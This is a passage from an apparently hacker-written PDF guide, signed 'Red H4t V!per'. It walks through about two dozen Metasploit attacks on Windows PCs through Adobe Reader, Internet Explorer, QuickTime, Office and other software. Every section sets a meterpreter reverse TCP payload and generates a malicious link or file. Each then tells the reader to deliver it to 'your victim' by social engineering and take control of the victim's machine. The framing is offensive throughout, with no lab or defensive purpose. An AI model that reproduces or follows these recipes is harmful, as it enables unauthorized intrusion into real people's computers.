Msf exploit (adobe_jbig2decode)>set lhost 192.168.42.131 (IP of Local Host) Msf exploit (adobe_jbig2decode)>set srvhost 192.168.42.131 (This must be an address on the local machine) Msf exploit (adobe_jbig2decode)>set uripath beniimage (The Url to use for this exploit) Msf exploit (adobe_jbig2decode)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/beniimage Send the link of the server to the victim via any social engineering technique.

W hen the victim open that link in their browser You get access to the victims PC.
Use Sessions -l and the Session number to connect to the session

[Type text]

Page 31

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC Using Adobe Collab.getIcon() Buffer Overflow: This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially crafted pdf that a contains malformed Collab.getIcon () call, an attacker may be able to execute arbitrary code.
Open backtrack terminal type msfconsole then type below command: use exploit/windows/browser/adobe_geticon

Msf exploit (adobe_geticon)>set payload windows/meterpreter/reverse_tcp Msf exploit (adobe_geticon)>show options Msf exploit (adobe_geticon)>set lhost 192.168.42.131 (IP of Local Host) Msf exploit (adobe_geticon)>set srvhost 192.168.42.131 (This must be an address on the local machine) Msf exploit (adobe_geticon)>set uripath adb (The Url to use for this exploit) Msf exploit (adobe_geticon)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/adb Send the link of the server to the victim via any social engineering technique.

When the victim open that link in their browser You get access to the victims PC.
Use Sessions -l and the Session number to connect to the session

\\ [Type text] Page 32

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC Using Microsoft Internet Explorer exec Command Use-After-Free Vulnerability :: This module exploits a vulnerability found in Microsoft Internet Explorer (MSIE). When rendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner, but the same memory is reused again later in the CMshtmlEd::Exec() function, leading to a use-after-free condition. Please note that this vulnerability has been exploited in the wild since Sep 14 2012, and there is currently no official patch for it.
Open backtrack terminal type msfconsole then type below command: use exploit/windows/browser/ie_execcommand_uaf

msf exploit (ie_execcommand_uaf)>set payload windows/meterpreter/reverse_tcp msf exploit (ie_execcommand_uaf)>set lhost 192.168.42.131 (IP of Local Host) msf exploit (ie_execcommand_uaf)>set srvhost 192.168.42.131 (This must be an address on the local machine) msf exploit (ie_execcommand_uaf)>set uripath ie (The Url to use for this exploit) msf exploit (ie_execcommand_uaf)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/ie Send the link of the server to the victim via any social engineering technique.

When the victim open that link in their browser You get access to the victims PC.
Use Sessions -l and the Session number to connect to the session

[Type text]

Page 33

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC Using Internet Explorer COM Create Object Code Execution : This module exploits generic code execution vulnerability in Internet Explorer by abusing vulnerable ActiveX objects.
Open backtrack terminal type msfconsole then type below command: use exploit/windows/browser/ie_createobject

Msf exploit (ie_createobject)>set payload windows/meterpreter/reverse_tcp Msf exploit (ie_createobject)>set lhost 192.168.42.131 (IP of Local Host) Msf exploit (ie_createobject)>set srvhost 192.168.42.131 (This must be an address on the local machine) Msf exploit (ie_createobject)>set uripath ie (The Url to use for this exploit) Msf exploit (ie_createobject)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/ie Send the link of the server to the victim via any social engineering technique. When the victim open that link in their browser You get access to the victims PC. Use Sessions -l and the Session number to connect to the session

[Type text]

Page 34

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC Using Internet Explorer Web View Folder Icon setSlice() Overflow : This module exploits a flaw in the WebViewFolderIcon ActiveX control included with Windows 2000, Windows XP, and Windows 2003. This flaw was published during the Month of Browser Bugs project
Open backtrack terminal type msfconsole then type below command: use exploit/windows/browser/ms06_057_webview_setslice

Msf exploit (ms06_057_webview_setslice)>set payload windows/meterpreter/reverse_tcp Msf exploit (ms06_057_webview_setslice)>set lhost 192.168.42.131 (IP of Local Host) Msf exploit (ms06_057_webview_setslice)>set srvhost 192.168.42.131 (This must be an address on the local machine) Msf exploit (ms06_057_webview_setslice)>set uripath ie (The Url to use for this exploit) Msf exploit (ms06_057_webview_setslice)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/ie Send the link of the server to the victim via any social engineering technique. When the victim open that link in their browser You get access to the victims PC. Use Sessions -l and the Session number to connect to the session

[Type text]

Page 35

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC Using Internet Explorer Daxctle.OCX Key Frame Method Heap Buffer Overflow Vulnerability : This module exploits heap overflow vulnerability in the Key Frame method of the direct animation ActiveX control. This is a port of the exploit implemented by Alexander Sotirov.
Open backtrack terminal type msfconsole then type below command: use exploit/windows/browser/ms06_067_keyframe

Msf exploit (ms06_067_keyframe)>set payload windows/meterpreter/reverse_tcp Msf exploit (ms06_067_keyframe)>set lhost 192.168.42.131 (IP of Local Host) Msf exploit (ms06_067_keyframe)>set srvhost 192.168.42.131 (This must be an address on the local machine) Msf exploit (ms06_067_keyframe) set uripath ie (The Url to use for this exploit) Msf exploit (ms06_067_keyframe)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/ie Send the link of the server to the victim via any social engineering technique. When the victim open that link in their browser You get access to the victims PC. Use Sessions -l and the Session number to connect to the session

[Type text]

Page 36

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC Using Internet Explorer create Text Range () Code Execution : This module exploits code execution vulnerability in Microsoft Internet Explorer. Both IE6 and IE7 (Beta 2) are vulnerable. It will corrupt memory in a way, which, under certain circumstances, can lead to an invalid/corrupt table pointer dereference. EIP will point to a very remote, non-existent memory location. This module is the result of merging three different exploit submissions and has only been reliably tested against Windows XP SP2. This vulnerability was independently discovered by multiple parties. The heap spray method used by this exploit was pioneered by Skylined.
Open backtrack terminal type msfconsole then type below command: use exploit/windows/browser/ms06_013_createtextrange

Msf exploit (ms06_013_createtextrange)>set payload windows/meterpreter/reverse_tcp Msf exploit (ms06_013_createtextrange)>set lhost 192.168.42.131 (IP of Local Host) Msf exploit (ms06_013_createtextrange)>set 192.168.42.131 (This must be an address on the local machine) Msf exploit (ms06_013_createtextrange)>set uripath ie (The Url to use for this exploit) Msf exploit (ms06_013_createtextrange)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/ie Send the link of the server to the victim via any social engineering technique. When the victim open that link in their browser You get access to the victims PC. Use Sessions -l and the Session number to connect to the session

[Type text]

Page 37

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC Using MS11_003 Internet Explorer Exploit : This module exploits a memory corruption vulnerability within Microsofts HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused. This leads to arbitrary code execution. This exploit utilizes a combination of heap spraying and the .NET 2.0 mscorie.dll module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions with .NET 2.0.50727 installed.
Open backtrack terminal type msfconsole then type below command: use exploit/windows/browser/ms11_003_ie_css_import

Msf exploit (ms11_003_ie_css_import)>set payload windows/meterpreter/reverse_tcp Msf exploit (ms11_003_ie_css_import)>set srvhost 192.168.42.131(This must be an address on the local machine) Msf exploit (ms11_003_ie_css_import)>set srvport 80 (The local port to listen on default: 8080) Msf exploit (ms11_003_ie_css_import)>set uripath hack.flv (The Url to use for this exploit) Msf exploit (ms11_003_ie_css_import)>set lhost 192.168.1.4 (IP of Local Host) Msf exploit (ms11_003_ie_css_import)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 : 80/hack.flv Send the link of the server to the victim via any social engineering technique. When the victim open that link in their browser You get access to the victims PC. Use Sessions -l and the Session number to connect to the session

[Type text]

Page 38

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC in LAN using Internet Explorer DHTML Behaviors : This module exploits a use-after-free vulnerability within the DHTML behaviors functionality of Microsoft Internet Explorer versions 6 and 7. This bug was discovered being used in-the-wild and was previously known as the iepeers vulnerability. The name comes from Microsofts suggested workaround to block access to the iepeers.dll file. According to Nico Waisman, The bug itself is when trying to persist an object using the setAttribute, which end up calling VariantChangeTypeEx with both the source and the destination being the same variant. So if you send as a variant an IDISPATCH the algorithm will try to do a VariantClear of the destination before using it. This will end up on a call to PlainRelease which deref the reference and clean the object. NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.
Open backtrack terminal type msfconsole then type below command: use exploit/windows/browser/ms10_018_ie_behaviors

Msf exploit (ms10_018_ie_behaviors)>set payload windows/meterpreter/reverse_tcp Msf exploit (ms10_018_ie_behaviors)>set lhost 192.168.42.31 (IP of Local Host) Msf exploit (ms10_018_ie_behaviors)>set srvhost 192.168.42.31 (This must be an address on the local machine) Msf exploit (ms10_018_ie_behaviors)>set uripath ie (The Url to use for this exploit) Msf exploit (ms10_018_ie_behaviors)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 : 80/ie Send the link of the server to the victim via any social engineering technique. When the victim open that link in their browser You get access to the victims PC. Use Sessions -l and the Session number to connect to the session
[Type text] Page 39

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows XP PC using Internet Explorer Winhlp32.exe MsgBox Code Execution : This module exploits a code execution vulnerability that occurs when a user presses F1 on Message Box originated from VBscript within a web page. When the user hits F1, the Message Box help functionality will attempt to load and use a HLP file from an SMB or WebDAV (if the WebDAV redirector is enabled) server. This particular version of the exploit implements a WebDAV server that will serve HLP file as well as a payload EXE. During testing warnings about the payload EXE being unsigned were witnessed. A future version of this module might use other methods that do not create such a warning.
Open backtrack terminal type msfconsole then type below command: use exploit/windows/browser/ms10_022_ie_vbscript_winhlp32

Msf exploit (ms10_022_ie_vbscript_winhlp32)>set payload windows/meterpreter/reverse_tcp Msf exploit (ms10_022_ie_vbscript_winhlp32)>set lhost 192.168.42.31 (IP of Local Host) Msf exploit (ms10_022_ie_vbscript_winhlp32)>set srvhost 192.168.42.31 (This must be an address on the local machine) Msf exploit (ms10_022_ie_vbscript_winhlp32)>set uripath / (The Url to use for this exploit) Msf exploit (ms10_022_ie_vbscript_winhlp32)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 Send the link of the server to the victim via any social engineering technique. When the victim open that link in their browser You get access to the victims PC. Use Sessions -l and the Session number to connect to the session

[Type text]

Page 40

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC using Internet Explorer CSS Set User Clip Memory Corruption Exploit :
This module exploits memory corruption vulnerability within Microsofts HTML engine (mshtml). When parsing an HTML page containing a specially crafted CSS tag, memory corruption occurs that can lead arbitrary code execution. It seems like Microsoft code inadvertently increments a vtable pointer to point to an unaligned address within the vtables function pointers. This leads to the program counter being set to the address determined by the address *vtable+0x30+1+. The particular address depends on the exact version of the mshtml library in use. Since the address depends on the version of mshtml, some versions may not be exploitable. Specifically, those ending up with a program counter value within another module, in kernel space, or just not able to be reached with various memory spraying techniques. Also, since the address is not controllable, it is unlikely to be possible to use ROP to bypass non-executable memory protections.
Open backtrack terminal type msfconsole then type below command: use exploit/windows/browser/ms10_090_ie_css_clip

Msf exploit (ms10_090_ie_css_clip)>set payload windows/meterpreter/reverse_tcp Msf exploit (ms10_090_ie_css_clip)>set lhost 192.168.42.31 (IP of Local Host) Msf exploit (ms10_090_ie_css_clip)>set srvhost 192.168.42.31 (This must be an address on the local machine) Msf exploit (ms10_090_ie_css_clip)>set uripath clips (The Url to use for this exploit) Msf exploit (ms10_090_ie_css_clip)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/clips Send the link of the server to the victim via any social engineering technique. When the victim open that link in their browser You get access to the victims PC. Use Sessions -l and the Session number to connect to the session

[Type text]

Page 41

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC Using Internet Explorer 7 CFunction Pointer Uninitialized Memory Corruption : This module exploits an error related to the CFunctionPointer function when attempting to access uninitialized memory. A remote attacker could exploit this vulnerability to corrupt memory and execute arbitrary code on the system with the privileges of the victim.
Open backtrack terminal type msfconsole then type below command: use exploit/windows/browser/ms09_002_memory_corruption

Msf exploit (ms09_002_memory_corruption)>set payload windows/meterpreter/reverse_tcp Msf exploit (ms09_002_memory_corruption)>set lhost 192.168.42.131 (IP of Local Host) Msf exploit (ms09_002_memory_corruption)>set srvhost 192.168.42.131 (This must be an address on the local machine) Msf exploit (ms09_002_memory_corruption)>set uripath ie (The Url to use for this exploit) Msf exploit (ms09_002_memory_corruption)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 : 80/ie Send the link of the server to the victim via any social engineering technique. When the victim open that link in their browser You get access to the victims PC. Use Sessions -l and the Session number to connect to the session

[Type text]

Page 42

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC Using Apple QuickTime 7.7.2 TeXML Style Element font-table Field Stack Buffer Overflow : This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow, and then gain arbitrary code execution under the context of the user. This is due to the QuickTime3GPP.gtx component not handling certain Style subfields properly, as the font-table field, which is used to trigger the overflow in this module. Because of QuickTime restrictions when handling font-table fields, only 031-039 bytes can be used to overflow, so at the moment DEP/ASLR bypass hasnt been provided. The module has been tested successfully on IE6 and IE7 browsers (Windows XP and Vista).
Open backtrack terminal type msfconsole then type below command: use exploit/windows/browser/apple_quicktime_texml_font_table

msf exploit (apple_quicktime_texml_font_table)>set payload windows/meterpreter/reverse_tcp msf exploit (apple_quicktime_texml_font_table)>set lhost 192.168.42.131 (IP of Local Host) msf exploit (apple_quicktime_texml_font_table)>set srvhost 192.168.42.131 (This must be an address on the local machine) msf exploit (apple_quicktime_texml_font_table)>set uripath /(The Url to use for this exploit) msf exploit (apple_quicktime_texml_font_table)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 : 8080/ Send the link of the server to the victim via any social engineering technique. When the victim open that link in their browser You get access to the victims PC. Use Sessions -l and the Session number to connect to the session
[Type text] Page 43

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC Using gAlan 0.2.1 Buffer Overflow : This module exploits a stack buffer overflow in gAlan 0.2.1 by creating a specially crafted galan file.
Open backtrack terminal type msfconsole then type below command: use exploit/windows/fileformat/galan_fileformat_bof

msf exploit (galan_fileformat_bof)>set payload windows/meterpreter/reverse_tcp msf exploit (galan_fileformat_bof)>set lhost 192.168.42.131 (IP of Local Host) msf exploit (galan_fileformat_bof)>exploit

After we successfully generate the malicious galan File, it will stored on your local computer /root/.msf4/local/msf.galan Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed. Use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.42.131 exploit Now send your msf.galan files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

[Type text]

Page 44

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC Using Orbit Downloader URL Unicode Conversion Overflow : This module exploits a stack-based buffer overflow in Orbit Downloader. The vulnerability is due to Orbit converting an URL ascii string to unicode in a insecure way with Multi ByteTo Wide Char. The vulnerability is exploited with a specially crafted metalink file that should be opened with Orbit through the File->Add Metalink option.
Open backtrack terminal type msfconsole then type below command: use exploit/windows/fileformat/orbit_download_failed_bof

msf exploit (orbit_download_failed_bof)>set payload windows/meterpreter/reverse_tcp msf exploit (orbit_download_failed_bof)>set lhost 192.168.1.4 (IP of Local Host) msf exploit (orbit_download_failed_bof)>exploit

After we successfully generate the malicious metalink File, it will stored on your local computer /root/.msf4/local/msf.metalink Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed. Use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.42.131 exploit Now send your msf.metalink files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

[Type text]

Page 45

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC Using Open VPN Trusted Path Privilege Escalation : This module exploits a logic flaw due to how the lpApplicationName parameter is handled. When the lpApplicationName contains a space, the file name is ambiguous. Take this file path as example: C:program fileshello.exe; The Windows API will try to interpret this as two possible paths: C:program.exe, and C:program fileshello.exe, and then execute all of them. To some software developers, this is an unexpected behavior, which becomes a security problem if an attacker is able to place a malicious executable in one of these unexpected paths, sometimes escalate privileges if run as SYSTEM. Some software such as OpenVPN 2.1.1, OpenSSH Server 5, and others have the same problem. The offensive technique is also described in Writing Secure Code (2nd Edition), Chapter 23, in the section Calling Processes Security on page 676.
Open backtrack terminal type msfconsole then type below command: use exploit/windows/local/trusted_service_path

msf exploit (trusted_service_path)>set payload windows/meterpreter/reverse_tcp msf exploit (trusted_service_path)>set lhost 192.168.42.131 (IP of Local Host) msf exploit (trusted_service_path)>set lport 4443 (Port of the local machine) msf exploit (trusted_service_path)>set session 1 msf exploit (trusted_service_path)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 Send the link of the server to the victim via any social engineering technique. When the victim open that link in their browser You get access to the victims PC. Use Sessions -l and the Session number to connect to the session
[Type text] Page 46

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC Using Winamp MAKI Buffer Overflow : This module exploits a stack based buffer overflow in Winamp 5.55. The flaw exists in the gen_ff.dll and occurs while parsing a specially crafted MAKI file, where memmove is used within a insecure way with user controlled data. To exploit the vulnerability the attacker must convince the attacker to install the generated mcvcore.maki file in the scripts directory of the default Bento skin, or generate a new skin using the crafted mcvcore.maki file. The module has been tested successfully on Windows XP SP3 and Windows 7 SP1.
Open backtrack terminal type msfconsole then type below command: use exploit/windows/fileformat/winamp_maki_bof

msf exploit (winamp_maki_bof)>set payload windows/meterpreter/reverse_tcp msf exploit (winamp_maki_bof)>set lhost 192.168.42.131 (IP of Local Host) msf exploit (winamp_maki_bof)>exploit

After we successfully generate the malicious maki File, it will stored on your local computer /root/.msf4/local/mcvcore.maki Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed. Use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.42.131 exploit Now send your mcvcore.maki files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.
[Type text] Page 47

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC Using Microsoft Office word MS12-027 MSCOMCTL ActiveX Buffer Overflow : This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious RTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 Control as exploited in the wild on April 2012. This module targets Office 2007 and Office 2010 targets. The DEP/ASLR bypass on Office 2010 is done with the Ikazuchi ROP chain proposed by Abysssec. This chain uses msgr3en.dll, which will load after office got load, so the malicious file must be loaded through File / Open to achieve exploitation.
Open backtrack terminal type msfconsole then type below command: use exploit/windows/fileformat/ms12_027_mscomctl_bof

msf exploit (ms12_027_mscomctl_bof)>set payload windows/meterpreter/reverse_tcp msf exploit (ms12_027_mscomctl_bof)>set lhost 192.168.42.131 (IP of Local Host) msf exploit (ms12_027_mscomctl_bof)>exploit

After we successfully generate the malicious doc File, it will stored on your local computer /root/.msf4/local/msf.doc Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed. Use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.42.131 exploit

[Type text]

Page 48

IriIriISIrIsT.Ir

Page 1

Now send your msf.doc files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

Attacting On Remote Windows PC Using global SCAPE Cute ZIP Stack Buffer Overflow : This module exploits stack-based buffer overflow vulnerability in version 2.1 of CuteZIP. In order for the command to be executed, an attacker must convince the target user to open a specially crafted zip file with CuteZIP. By doing so, an attacker can execute arbitrary code as the target user.
Open backtrack terminal type msfconsole then type below command: use exploit/windows/fileformat/cutezip_bof

msf exploit (cutezip_bof)>set payload windows/meterpreter/reverse_tcp msf exploit (cutezip_bof)>set lhost 192.168.42.131 (IP of Local Host) msf exploit (cutezip_bof)>exploit

After we successfully generate the malicious ZIP File, it will stored on your local computer /root/.msf4/local/msf.zip Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed. Use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.42.131 exploit

[Type text]

Page 49

IriIriISIrIsT.Ir

Page 1

Now send your msf.zip files to victim, as soon as they download and open it. Now you can access meterpreter shell

Attacting On Remote Windows PC Using Simple Web Server Connection Header Buffer Overflow : This module exploits vulnerability in Simple Web Server 2.2 rc2. A remote user can send a long string data in the Connection Header to causes an overflow on the stack when function vsprintf () is used, and gain arbitrary code execution. The module has been tested successfully on Windows 7 SP1 and Windows XP SP3
Open backtrack terminal type msfconsole then type below command: use exploit/windows/http/sws_connection_bof

msf exploit(sws_connection_bof) > set payload windows/meterpreter/reverse_tcp msf exploit(sws_connection_bof) > set lhost 192.168.42.131 [IP of Local Host] msf exploit(sws_connection_bof) > set rhost 192.168.1.7 [IP of Victim PC] msf exploit(sws_connection_bof) > exploit

Now an URL you should give to your victim http:// 192.168.42.131 Send the link of the server to the victim via any social engineering technique. When the victim open that link in their browser You get access to the victims PC. Use Sessions -l and the Session number to connect to the session

[Type text]

Page 50

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows 7 PC Using Microsoft XML Core Services MSXML Uninitialized Memory Corruption : This module exploits a memory corruption flaw in Microsoft XML Core Services when trying to access an uninitialized Node with the get Definition API, which may corrupt memory allowing remote code execution.
Open backtrack terminal type msfconsole then type below command: use exploit/windows/browser/msxml_get_definition_code_exec

Msf exploit (msxml_get_definition_code_exec)>set payload windows/meterpreter/reverse_tcp Msf exploit (msxml_get_definition_code_exec)>set lhost 192.168.42.131 (IP of Local Host) Msf exploit (msxml_get_definition_code_exec)>set srvhost 192.168.42.131 (This must be an address on the local machine) Msf exploit (msxml_get_definition_code_exec)>set uripath / (The Url to use for this exploit) Msf exploit (msxml_get_definition_code_exec)>exploit

Now an URL you should give to your victim http:// 192.168.42.131:8080/ Send the link of the server to the victim via any social engineering technique. When the victim open that link in their browser You get access to the victims PC. Use Sessions -l and the Session number to connect to the session

[Type text]

Page 51

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows 7 PC Using Poison Ivy 2.3.2 C&C Server Buffer Overflow : This module exploits a stack buffer overflow in Poison Ivy 2.3.2 C&C server. The exploit does not need to know the password chosen for the bot/server communication. If the C&C is configured with the default admin password, the exploit should work fine. In case of the C&C configured with another password the exploit can fail. The check command can be used to determine if the C&C target is using the default admin password. Hopefully an exploit try wont crash the Poison Ivy C&C process, just the thread responsible of handling the connection. Because of this the module provides the RANDHEADER option and a bruteforce target. If RANDHEADER is used a random header will be used. If the brute force target is selected, a random header will be sent in case the default for the password admin doesnt work. Bruteforce will stop after 5 tries or a session obtained.
Open backtrack terminal type msfconsole then type below command: use exploit/windows/misc/poisonivy_bof

Msf exploit (poisonivy_bof)>set payload windows/meterpreter/reverse_tcp Msf exploit (poisonivy_bof)>set lhost 192.168.42.131 (IP of Local Host) Msf exploit (poisonivy_bof)>set rhost 192.168.12.119 (IP of Victim PC) Msf exploit (poisonivy_bof)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 Send the link of the server to the victim via any social engineering technique. When the victim open that link in their browser You get access to the victims PC. Use Sessions -l and the Session number to connect to the session
[Type text] Page 52

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC Using Apple QuickTime TeXML Stack Buffer Overflow : This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow, and then gain arbitrary code execution under the context of the user. The flaw is generally known as a bug while processing the transform attribute, however, that attack vector seems to only cause a Terminate Process call due to a corrupt stack cookie, and more data will only trigger a warning about the malformed XML file. This module exploits the color value instead, which accomplishes the same thing.
Open backtrack terminal type msfconsole then type below command: use exploit/windows/fileformat/apple_quicktime_texml

Msf exploit (apple_quicktime_texml)>set payload windows/meterpreter/reverse_tcp Msf exploit (apple_quicktime_texml)>set lhost 192.168.42.131 (IP of Local Host) Msf exploit (apple_quicktime_texml)>set srvhost 192.168.1.3 (Victim IP) Msf exploit (apple_quicktime_texml)>show targets Msf exploit (apple_quicktime_texml)>set target 0 Msf exploit (apple_quicktime_texml)>exploit

After we successfully generate the malicious File, it will stored on your local computer /root/.msf4/local/msf.xml Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

[Type text]

Page 53

IriIriISIrIsT.Ir

Page 1

Use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.42.131 exploit Now send your msf.xml files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

Attacting On Remote Windows PC Using Microsoft Office Click Once Unsafe Object Package Handling Vulnerability :
This module exploits a vulnerability found in Microsoft Offices Click Once feature. When handling a Macro document, the application fails to recognize certain file extensions as dangerous executables, which can be used to bypass the warning message. This allows you to trick your victim into opening the malicious document, which will load up either a python or ruby payload based on your choosing, and then finally download and execute our executable.
Open backtrack terminal type msfconsole then type below command: use exploit/windows/fileformat/ms12_005

Msf exploit (ms12_005)>set payload windows/meterpreter/reverse_tcp Msf exploit (ms12_005)>set lhost 192.168.42.131 (IP of Local Host) Msf exploit (ms12_005)>exploit

[Type text]

Page 54

IriIriISIrIsT.Ir

Page 1

After we successfully generate the malicious Document File, it will stored on your local computer /root/.msf4/local/msf.docm Now send your msf.docm files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

[Type text]

Page 55

IriIriISIrIsT.Ir

Page 1

Tnx All Dears For Reading This Article By Red H4t V!per

[Type text]

Page 56

IriIriISIrIsT.Ir

Page 1

Вам также может понравиться